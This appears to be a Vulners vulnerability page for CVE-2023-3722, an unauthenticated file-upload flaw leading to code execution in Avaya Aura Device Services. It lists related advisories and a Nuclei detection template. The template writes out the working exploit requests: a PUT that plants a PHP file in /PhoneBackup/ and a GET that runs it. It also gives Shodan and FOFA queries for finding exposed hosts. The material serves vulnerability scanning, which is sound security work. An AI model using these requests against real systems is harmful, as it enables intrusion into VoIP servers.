| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Avaya Aura_Device_Services | 19 Nov 202419:40 | – | githubexploit | |
| CVE-2023-3722 | 19 Nov 202419:43 | – | circl | |
| Avaya Aura Device Services 代码问题漏洞 | 19 Jul 202300:00 | – | cnnvd | |
| CVE-2023-3722 | 19 Jul 202319:56 | – | cve | |
| CVE-2023-3722 Avaya Aura Device Services Remote Code Execution | 19 Jul 202319:56 | – | cvelist | |
| Vulnerability fixed in Avaya Aura | 20 Jul 202300:00 | – | ncsc | |
| CVE-2023-3722 | 19 Jul 202320:15 | – | nvd | |
| CVE-2023-3722 | 19 Jul 202320:15 | – | osv | |
| Command injection | 19 Jul 202320:15 | – | prion | |
| PT-2023-25838 · Avaya · Avaya Aura Device Services | 19 Jul 202300:00 | – | ptsecurity |
| Source | Link |
|---|---|
| github | www.github.com/pizza-power/CVE-2023-3722 |
| download | www.download.avaya.com/css/public/documents/101076366 |
id: CVE-2023-3722
info:
name: Avaya Aura Device Services - OS Command Injection
author: iamnoooob,pdresearch
severity: high
description: |
An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier.
impact: |
Unauthenticated attackers can upload malicious PHP files to execute arbitrary code with web server privileges on Avaya Aura Device Services, potentially compromising VoIP infrastructure and accessing telecommunications data.
remediation: |
Update Avaya Aura Device Services to a version newer than 8.1.4.0 that validates uploaded files and restricts code execution in the PhoneBackup directory.
reference:
- https://github.com/pizza-power/CVE-2023-3722
- https://download.avaya.com/css/public/documents/101076366
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
cvss-score: 8.6
cve-id: CVE-2023-3722
cwe-id: CWE-434
epss-score: 0.03334
epss-percentile: 0.87111
cpe: cpe:2.3:a:avaya:aura_device_services:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: avaya
product: aura_device_services
shodan-query: html:"Avaya Aura® Utility Services"
fofa-query: body="Avaya Aura® Utility Services"
tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev,vuln
variables:
filename: "{{randbase(8)}}"
marker: "{{randstr}}"
http:
- raw:
- |
PUT /PhoneBackup/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
<?phP echo base64_decode($_GET['input']); ?>
matchers:
- type: dsl
dsl:
- 'status_code == 201'
- 'contains(body, "Resource /PhoneBackup/{{filename}}.php has been created.")'
condition: and
internal: true
- raw:
- |
GET /PhoneBackup/{{filename}}.php?input={{base64(marker)}} HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{marker}}")'
condition: and
# digest: 490a0046304402203e808762c23e6d46f9242d3a9ea810d9827e0c8d68e563fea8055a7cb0d99e47022017d30d18e706d950c994ad9e3469710c67c0d244b0ed5397089baa401b60dea9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation